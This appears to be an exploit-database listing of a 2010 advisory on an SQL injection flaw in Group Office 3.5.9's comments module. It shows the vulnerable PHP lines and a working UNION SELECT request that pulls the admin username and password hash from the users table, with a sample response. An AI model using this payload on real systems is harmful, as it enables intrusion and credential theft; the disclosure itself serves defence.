Group Office (comment_id) SQL Injection Vulnerability

2010-07-16T00:00:00
ID 1337DAY-ID-13366
Type zdt
Reporter Canberk BOLAT
Modified 2010-07-16T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =====================================================
Group Office (comment_id) SQL Injection Vulnerability
=====================================================


# Title
Group Office Remote SQL Injection Vulnerability
 
# Author
ADEO Security
 
# Published
17/07/2010
 
# Version
3.5.9 (Possible all versions)
 
# Vendor
http://www.group-office.com
 
# Download
http://sourceforge.net/projects/group-office/files/3.5/groupoffice-com-3.5.9.tar.gz/download
 
# Description
"Take your office online with Group-Office groupware. Share projects,
calendars, files and e-mail online with co-workers and clients. Easy
to use and fully customizable, Group-Office takes online collaboration
to the next level."
 
# Credit
Vulnerability founded by Canberk BOLAT
    - Mail: security[AT]adeo.com.tr
    - Web: http://security.adeo.com.tr , http://adeosecuritylabs.com
 
# Vulnerability
Remote attacker can inject sql codes to the system that host target
web application. Its high level vulnerability.
 
modules/comments/json.php:
23  $comment = $comments->get_comment(($_REQUEST['comment_id']));
 
 
In json.php 'get_comment' method called with value of HTTP Request
that's name 'comment_id'. In the 'get_comment' method, variable
'$comment_id' inserted to sql query and executed by application.
 
modules/comments/classes/comments.class.inc.php:
function get_comment($comment_id)
{
$this->query("SELECT * FROM co_comments WHERE id=".$this->escape($comment_id));
...
 
'escape' method can't prevent because attacker don't need single
quotes for successful exploitation.
 
# Exploitation
Request: http://server/groupoffice/modules/comments/json.php?task=comment&comment_id=888881+union+select+1,2,3,4,5,6,(select+concat_ws(0x3a,username,password)+from+go_users+where+id=1)
 
Response: {"data":{"id":"1","link_id":"2","link_type":"3","user_id":"4","ctime":"01-01-1970
1:00","mtime":"01-01-1970
1:00","comments":"admin:$1$sM5wjKS9$wJPfZZWO53uu8eCxjOesS\/","user_name":""},"success":true}
 
Application's response contains result of the attacker's injected sql codes.



#  0day.today [2018-03-09]  #